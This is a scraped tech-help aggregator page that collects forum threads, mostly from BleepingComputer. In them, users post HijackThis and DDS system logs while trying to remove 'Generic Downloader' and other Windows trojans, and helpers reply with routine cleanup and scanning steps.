Tech Problem Aggregator

(Suggestions? & ) Help with “Generic Downloader.v” Trojan? (hijackthis log)

Q: (Suggestions? & ) Help with “Generic Downloader.v” Trojan? (hijackthis log)

Hi,
I NEVER open or launch ANYTHING I've received or downloaded without doing a McAfee virus scan on it first, and I'm very diligent about updating my virus/malware definitions, using automatic updates for McAfee VirusScan8 and MS Antispyware beta, and manually doing my updates for AdAwareSE, Spybot14, and SpywareBlaster virtually every time I open a browser, as well as running Stinger every couple days or so, but I have a major problem with a recurring Generic Downloader.v javainstaller applet Trojan that gets detected EVERY time I run AdAware, and have spent HOURS and HOURS trying to debug my system and hopefully _prevent_ its reoccurrence, with no luck so far. Am pretty frustrated.
Not only for the lack of success with that _known_ problem, but am pretty sure there is at least one or more _other_ things going on as well, judging by the random sluggishness, freeze-up, and glitches I'm experiencing also. Have recently set up a limited browsing account for myself to hopefully forestall some of the problems with browsing, as well as disabling Java, but still, have noticed that invariably there seems to be one more process running than is shown in my taskbar when I return to the computer after a few minutes and it's in sleep mode. This makes me think that there is _at least_ one other problem as well, since I can't identify anything in my registry settings and process viewers that seems to indicate what it would be.
I've run all the above scans in safe mode numerous times and it has never stopped it yet; pretty frustrated that McAfee says that updated engine and DAT files will detect it and remove it - how about BLOCKING the bleeping thing?!? Got so frustrated that I just downloaded a trial version of F-Secure Anti-Virus 2006 to run it (which necessitated going offline and the removal of both AdAware and McAfee to do so), and after running a full scan (that took 3&1/2 hours!), it *#$*^#! refused to let me view the report. GRRRRRRR!
So, of course, I just ran it again, so I could see what 2 viruses it said it detected the first time and to see which ONE (why only one??) of the 2 it renamed (per my setting changes to hopefully at least deactivate it if I couldn't remove it) and Guess What?!?!?! Couldn't view the report again this time either!! Said it detected only 1 virus this time, but it wasn't re-named. Clicked on the (active) ScanWizard Show Report button>>nothing. Click on the CommandCenter ViewReport button>>No new report. ??????? GRRRRRRR!!!! Not too impressed with F-Secure at this point. The WHOLE POINT was to see what they were, and how does it get me anywhere if they're now re-named (one of them, anyways) but still don't know what/where they are?!? Maddening. Truly maddening after 7+ hours invested. F-Secure just sucks in my book at this point, as I now have to re-install both AdAware and McAfee again, to boot. Have downloaded a Sophos trial am willing to give a go with if anyone has a good word about it.
Also, I have a new DSL connection (FINALLY got wired for it way out here in the boonies! BellSouth, 1.5mbps, Westell/Wirespeed modem), and just recently uninstalled Firefox to see if that cured the problem - NOPE. Using IE6 now, with all MS security updates, and though I have XP's (SP2) firewall turned on with cookies blocked, privacy settings on MedHi, and scripting notification on, am not sure if there's something else in the mix that I'm missing, as I'm now getting notifications from this morning's installation of F-Secure that there are possible browser hijack attempts when I go back online or sometimes open a new link (??that may have been happening all along, but just without notification of them previously??).
I also have one more anomaly that I can't explain; I have a (one and one only) TOTALLY blank Command Line entry in my msconfig Startup report that is attributed to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. I don't know what this is or why it alone is not described as all the others are. Have deactivated other applications here that I know what they are and have had no problems (although would like to know how to remove some of them still present _entirely_ from the Startup Programs/menu) but definitely will not mess with this registry without knowing what I'm doing first.
Have been advised by a friend to get my own router (a LinkSys, probably) to (his words) 100% prevent such problems, but first, would really like to get my system cleaned and have my settings changed/restored to eliminate/prevent as many of these problems from re-occurring in case I don't get the router.
Can anyone help with my hijackthis log below and/or have any suggestions otherwise? Much appreciated - Thanks!!

Logfile of HijackThis v1.99.1
Scan saved at 3:22:58 PM, on 12/17/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\F-SECU~1\backweb\4476822\Program\SERVIC~1.EXE
C:\Program Files\F-Secure Internet Security\Anti-Virus\fsgk32st.exe
C:\Program Files\F-Secure Internet Security\backweb\4476822\program\fsbwsys.exe
C:\Program Files\F-Secure Internet Security\Anti-Virus\FSGK32.EXE
C:\Program Files\F-Secure Internet Security\Common\FSMA32.EXE
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\F-Secure Internet Security\Anti-Virus\fssm32.exe
C:\Program Files\F-Secure Internet Security\Common\FSMB32.EXE
C:\Program Files\F-Secure Internet Security\Common\FCH32.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\F-Secure Internet Security\Common\FAMEH32.EXE
C:\Program Files\F-Secure Internet Security\Anti-Virus\fsqh.exe
C:\Program Files\F-Secure Internet Security\Anti-Virus\fsrw.exe
C:\Program Files\F-Secure Internet Security\FWES\Program\fsdfwd.exe
C:\Program Files\F-Secure Internet Security\Anti-Virus\fsav32.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
C:\WINDOWS\SYSTEM32\3cmlink.exe
C:\Program Files\F-Secure Internet Security\Common\FSM32.EXE
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\WINDOWS\SYSTEM32\3cshtdwn.exe
C:\PROGRA~1\F-SECU~1\ANTI-S~1\fsaw.exe
C:\WINDOWS\SYSTEM32\3cmlink.exe
C:\Program Files\F-Secure Internet Security\FSGUI\fsguidll.exe
C:\Program Files\F-Secure Internet Security\FSGUI\ispnews.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\F-Secure Internet Security\backweb\4476822\Program\fspex.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Microsoft Office\Office10\WINWORD.EXE
C:\Program Files\F-Secure Internet Security\FSGUI\fsavgui.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
C:\Program Files\Common Files\Microsoft Shared\Speech\sapisvr.exe
C:\Documents and Settings\Bradley\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msnbc.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msnbc.com/
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Google Desktop Search Capture - {7c1ce531-09e9-4fc5-9803-1c2956615786} - C:\Program Files\Google\Google Desktop Search\GoogleDesktopIE.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [Cmaudio] RunDll32 cmicnfg.cpl,CMICtrlWnd
O4 - HKLM\..\Run: [3c1807pd] C:\WINDOWS\SYSTEM32\3cmlink.exe RunServices \Device\3cpipe-3c1807pd
O4 - HKLM\..\Run: [F-Secure Manager] "C:\Program Files\F-Secure Internet Security\Common\FSM32.EXE" /splash
O4 - HKLM\..\Run: [F-Secure TNB] "C:\Program Files\F-Secure Internet Security\TNB\TNBUtil.exe" /CHECKALL /WAITFORSW
O4 - HKLM\..\Run: [F-Secure Startup Wizard] "C:\Program Files\F-Secure Internet Security\FSGUI\FSSW.EXE" /reboot
O4 - HKLM\..\Run: [News Service] "C:\Program Files\F-Secure Internet Security\FSGUI\ispnews.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [APV] H:\Software\Process viewers\Autostart_ Process Viewer\autostart_and_process_viewer.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: F-Secure 2006.lnk = C:\Program Files\F-Secure Internet Security\backweb\4476822\Program\fspex.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: &Block this popup - C:\Program Files\F-Secure Internet Security\Anti-Spyware\blockpopups.htm
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar2.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://c:\program files\google\GoogleToolbar2.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar2.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar2.dll/cmcache.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar2.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://c:\program files\google\GoogleToolbar2.dll/cmtrans.html
O9 - Extra button: IE Shield - {300DB664-75B5-47c0-8B45-A44ACCF73C00} - C:\Program Files\F-Secure Internet Security\Anti-Spyware\ieshield.dll
O9 - Extra 'Tools' menuitem: IE Shield... - {300DB664-75B5-47c0-8B45-A44ACCF73C00} - C:\Program Files\F-Secure Internet Security\Anti-Spyware\ieshield.dll
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage) - http://go.microsoft.com/fwlink/?linkid=36467&clcid=0x409
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1134567180836
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://zone.msn.com/binFramework/v10/ZIntro.cab34246.cab
O16 - DPF: {E5D419D6-A846-4514-9FAD-97E826C84822} (HeartbeatCtl Class) - http://fdl.msn.com/zone/datafiles/heartbeat.cab
O23 - Service: F-Secure 2006 (BackWeb Plug-in - 4476822) - F-Secure Internet Security 2005 - C:\PROGRA~1\F-SECU~1\backweb\4476822\Program\SERVIC~1.EXE
O23 - Service: FSGKHS (F-Secure Gatekeeper Handler Starter) - F-Secure Corporation - C:\Program Files\F-Secure Internet Security\Anti-Virus\fsgk32st.exe
O23 - Service: fsbwsys - F-Secure Corp. - C:\Program Files\F-Secure Internet Security\backweb\4476822\program\fsbwsys.exe
O23 - Service: F-Secure Anti-Virus Firewall Daemon (FSDFWD) - F-Secure Corporation - C:\Program Files\F-Secure Internet Security\FWES\Program\fsdfwd.exe
O23 - Service: F-Secure Management Agent (FSMA) - F-Secure Corporation - C:\Program Files\F-Secure Internet Security\Common\FSMA32.EXE
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: Pml Driver HPH11 - HP - C:\WINDOWS\system32\HPHipm11.exe

A: (Suggestions? & ) Help with “Generic Downloader.v” Trojan? (hijackthis log)

7 more replies
Answer Match 78.96%

Here is my HiJack This log..I need help!

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:36:54 AM, on 7/18/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\acs.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\WINDOWS\system32\cisvc.exe
C:\WINDOWS\system32\E_S00RP1.EXE
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\HPZipm12.exe
c:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\Program Files\Browser MOUSE\mouse32a.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\Java\jre1.6.0_06\... Read more

A:Trojan Downloader.purity.y Trojan, Downloader Generic 7.zkr And Someother Variations

Hello Anne Arp and welcome to BleepingComputer,

1. * Clean your Cache and Cookies in IE:
Close all instances of Outlook Express and Internet Explorer
Go to Control Panel > Internet Options > General tab
Under Browsing History, click Delete.
Click Delete Files, Delete cookies and Delete history
Click Close below.

* Clean your Cache and Cookies in Firefox (In case you also have Firefox installed):
Go to Tools > Options.
Click Privacy in the menu..
Click the Clear now button below.. A new window will popup what to clear.
Select all and click the Clear button again.
Click OK to close the Options window

* Clean other Temporary files + Recycle bin
Go to start > run and type: cleanmgr and click ok.
Let it scan your system for files to remove.
Make sure Temporary Files, Temporary Internet Files, and Recycle Bin are the only things checked.
Press OK to remove them.

2. Please download Malwarebytes' Anti-Malware from Here or Here
Doubleclick mbam-setup.exe to install the application.
Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
If an update is found, it will download and install the latest version.
Once the program has loaded, select "Perform Quick Scan", then click Scan.
The scan may take some time to finish, so please be patient.
When the scan is complete, click OK, then Show Results to view the results.
Make sure that everything is checked, and click Remove Selected.
When disinfection is complete... Read more

2 more replies
Answer Match 77.28%

DDS (Ver_09-01-18.01) - NTFSx86
Run by Owner at 8:21:49.90 on Wed 01/21/2009
Internet Explorer: 6.0.2900.2180
Microsoft Windows XP Home Edition 5.1.2600.2.1252.1.1033.18.447.141 [GMT -6:00]
============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\Program Files\a-squared Free\a2service.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\System32\gearsec.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\System32\svchost.exe -k imgsvc
C:\Program Files\Java\jre6\bin\jusched.exe
C:\windows\system\hpsysdrv.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\VTTimer.exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\ps2.exe
C:\Program Files\Lexmark 2200 Series\lxbvbmgr.exe
C:\WINDOWS\ALCXMNTR.EXE
C:\Program Files\FinePixViewer\QuickDCF.exe
C:\Program Files\Lexmark 2200 Series\lxbvbmon.exe
C:\Program Files ... Read more

A:Infected with Win/Heur, Downloader.generic Trojan and Backdoor Generic

Please close this post. Problem has been fixed.

2 more replies
Answer Match 74.34%

Mod Edit: Log split away from topic here http://www.bleepingcomputer.com/forums/t/144809/infected-by-something-wicked/

Deckard system scanner report is below. I was not able to load Kaspersky because my IE is too corrupted and I can't get enough space on my hard disk in time before whatever is on my computer partitions off the space. I have cleared about 1 Gig of new space on my computer but the computer still shows that it has less than 100 MB of space on it.

Deckard's System Scanner v20071014.68
Run by Paul Hanken on 2008-05-05 23:34:54
Computer is in Normal Mode.
--------------------------------------------------------------------------------

-- System Restore --------------------------------------------------------------
Failed to create restore point; disk is full.
Backed up registry hives.
Performed disk cleanup.
System Drive C: has 0.01 GiB (less than 15%) free.

-- HijackThis (run as Paul Hanken.exe) ----------------------------------------
Unable to find log (file not found); running clone.

-- HijackThis Clone ------------------------------------------------------------
Emulating logfile of Trend Micro HijackThis v2.0.2
Scan saved at 2008-05-05 23:38:01
Platform: Windows XP Service Pack 2 (5.01.2600)
MSIE: Internet Explorer (7.00.6000.16640)
Boot mode: Normal

Running processes:
C:\WINDOWS\system32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\BRSVC01A.... Read more

A:Trojan Vundo.EGG, Trojan Retapu.D, Generic.Zeno.E5F12F0C, Adware.Isearch.D, Trojan Downloader.Small.

Hello 425Fool,

Welcome to Bleeping Computer

Sorry about the delay. If you still need help, please post a new HijackThis log to make sure nothing has changed, and I'll be happy to look at it for you.

Thanks,
tea

4 more replies
Answer Match 72.66%

This is a business computer and it is very important that it runs properly, been having issues with it for a week now. I have tried running several anti-virus programs to no avail. Currently using Panda, but used some other free software like AVG etc.

Hoping you can help me, here is the hijackthis log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:12:36 PM, on 2/2/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Panda Security\Panda Antivirus Pro 2009\TPSrv.exe
C:\PROGRAM FILES\PANDA SECURITY\PANDA ANTIVIRUS PRO 2009\WebProxy.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Broadcom\ASFIPMon\AsfIpMon.exe
C:\Program Files\Citrix\GoToMyPC\g2svc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Citrix\GoToMyPC\g2comm.exe
C:\Program Files\Panda Security\Panda Antivirus Pro 2009\PsCtrls.exe
C:\Program Files\Panda Security\Panda Antivirus Pro 2009\PavFnSvr.exe
C:\Program Files\Citrix\GoToMyPC\g2pre.exe
C:\Program Files... Read more

A:Business computer infected with Trojan/CI.A, Trojan Downloader.MDW, and Generic Trojan

Hi,

This is a business computer and it is very important that it runs properly

Not sure if you're aware how severely infected this computer is.
Since you are posting a log from a Company owned computer... There are a few things that need attention first before we proceed with this..

* You must inform your Supervisor immediately.
This because of:
Most company machines are connected into a network at some time or other, and your infection may compromise the security of that network.
If sensitive material is compromised by an infection, your company could be held liable.

* Your Company must give permission for us to give you assistance.
This because of:
We are not here to replace your company's IT Department. If there's an IT Department, then they are responsible to deal with this.
There may be sensitive material on your computer that your company would not want revealed in an open forum.

Also, since this is a computer used at work - the first thing I always advise is to back up important files you don't want to lose, this since malware causes a system unstable and it may happen that it suddenly won't boot anymore, because of the damage already present.

Your system is severely infected. Problem with these infections nowadays is, it causes a lot of damage. Even if we clean the malware off your system, I can't guarantee that your system will be clean afterwards, because these infections/bundles leave a lot of leftovers behind that most scanners won't even recognise and logs won't show.
Also, I ca... Read more

2 more replies
Answer Match 72.24%

Hi! McAfee detected two trojans (generic.dx) a few days ago, which I chose to remove. The computer had been running slowly and freezing quickly after booting up. Later during another scan, McAfee detected a generic downloader which really alarmed me because it was in my program files for all my passcodes (?)

I have not seen any pop-ups so far in Firefox, no strange or unusual messages; just a really slow boot-up and a new trojan found every time McAfee runs scans. It doesn't seem to go away =(

If you could help me that would be great!!!! Here is the HJT log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:32:38 PM, on 9/26/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\PROGRA~1\McAfee.com\Agent\mcagent.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\DellTPad\Apoint.exe
C:\Windows\OEM02Mon.exe
C:\Windows\System32\WLTRAY.EXE
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\Creative\SBLive 24-Bit External\Volume Panel\VolPanlu.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Creative\Shared Files\Module Loader\DLLML.exe
C:\Program Files\AIM\AIM Pro\aimpro.exe
C:\Program Files\Sigmatel\C-Major Audio\WDM\sttray.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Dell Support Center\bin\sprtcmd.exe
C:\Program Fi... Read more

More replies
Answer Match 72.24%

About every week or two McAfee finds either generic.dx or generic downloader.dx. It's installed as a service. I have to run McAfee in safe mode to remove it. My fear is that something is installed on my PC that activates every week or two and re-installs this trojan. I've run a complete McAfee which doesn't find anything. I did the on-line Kaspersky primary area scan. I've also run SpyBot and MalwareBytes and they haven't found anything. I also have Windows Defender installed. I run the Windows Xp firewall. I run Secunia PSI and MS Baseline Security so I'm pretty up to date on my patches. My fear is that something is installed that hasn't been found that wakes up every week or two and tries to re-install this trojan. I've attached the hijack this log and info below. thanks for looking at this.

info.txt logfile of random's system information tool 1.04 2008-12-01 06:58:34

======Uninstall list======

-->C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe /uninstall
-->C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe /uninstall
-->C:\WINDOWS\IsUninst.exe -fC:\WINDOWS\orun32.isu
-->rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:\WINDOWS\INF\PCHealth.inf
32 Bit HP CIO Components Installer-->MsiExec.exe /I{F1E63043-54FC-429B-AB2C-31AF9FBA4BC7}
3CIPCalc-->C:\WINDOWS\IsUninst.exe -f"C:\Program Files\3Com\3CIPCalc\Uninst.isu&... Read more

A:generic.dx and generic downloader.dx Trojan

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a description of your problem, along with any steps you may have performed so far.

Upon completing the steps below a staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:

Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.com
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results, click no to the Optional_Scan
Follow the instructions that pop up for posting the results.
Close the program window, and delete the program from your desktop.

Please note: You may have to disable ... Read more

6 more replies
Answer Match 71.4%

DDS (Ver_09-05-14.01) - NTFSx86
Run by gus at 0:50:16.98 on Thu 06/11/2009
Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_07
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1015.571 [GMT -4:00]
============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\SYMANT~1\SYMANT~1\DefWatch.exe
C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\PROGRA~1\MYWEBS~1\bar\3.bin\mwsoemon.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\rundll32.exe
C:\PROGRA~1\MYWEBS~1\bar\3.bin\m3SrchMn.exe
C:\WINDOWS\system32\Rundll32.exe
C:\WINDOWS\system32\Rundll32.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\SYMANT~1\SYMANT~1\Rtvscan.exe
C:\Program Files\Norton SystemWorks\... Read more

A:Packed Generic 214 , Infostealer Banker C ,Trojan Horse, Downloader, and Backdoor Trojan

Hello! My name is Sam and I will be helping you. In order to see what's going on with your computer I will ask for you to post various logs from the tools that we will use to resolve your issue. Please also share with me any information about how your computer is reacting and behaving each step of the way as we work through this process.

Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2

Make sure you are connected to the Internet.
Double-click on Download_mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.

MBAM will automatically start and you will be asked to update the program before performing a scan. If an update is found, the program will automatically update itself. Press the OK button to close that box and continue. If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.

On the Scanner tab:
Make sure the "Perform Quick Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
The scan will begin and "Scan in progress" will show at the top. It may ta... Read more

2 more replies
Answer Match 70.14%

Norton never finds it, and AVG won't rid of it! Help! I REALLY need to get rid of it!

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton AntiVirus\SAVScan.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\RunDll32.exe
C:\WINDOWS\essspk.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\CyberLink DVD Solution\PowerDVD\PDVDServ.exe
C:\Program Files\D-Link\AirPlus XtremeG\AirPlusCFG.exe
C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Grisoft\AVG Ant... Read more

A:Trojan Generic Downloader HELP!

12 more replies
Answer Match 70.14%

As you can probably tell by my name, I am new at this and technically challenged. I run windows xp and use the free mcafee antivirus program. I recently received a mcafee popup indicating that I have the generic downloader.bt trojan. The first thing I did was do a system restore which was successful but did not get rid of the trojan. I went looking at some similar threads and couldn't really understand much of what was said. I tried to do another system restore and the computer said it could not do it. I chose another date, and it still couldn't do it. I tried downloading spybot search and destroy and it showed some things, but I didn't see this trojan and it also said that to use the program, I have to buy it. While I am not opposed to buying the program, I don't want to have to buy 5 programs in the hope that one will work.

Any help anyone can give would be greatly appreciated.
 

A:Generic Downloader.bt trojan

10 more replies
Answer Match 70.14%

I have this on my laptop and I really need help. Please help.
C:\windows\system32\xlibgfl254.dll is infected by the Generic Downloader.bt trojan
 

A:Please HELP!!! Generic Downloader.bt Trojan

16 more replies
Answer Match 70.14%

Hey guys, I recently turned on my computer and was greeted by McAfee's message about a trojan called Generic Downloader.z. However, McAfee said it could not delete or quarantine the file. My computer is running a lot slower and I have no idea what to do. I am home for the weekend for Thanksgiving before going back to college next week so I am hoping I can fix this as fast as possible. Thanks in advance for the help.

Here is my Hijackthis Log:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:24:33 AM, on 11/23/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\brsvc01a.exe
C:\WINDOWS\System32\brss01a.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\acsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\McAfee\HackerWatch\HWAPI.exe
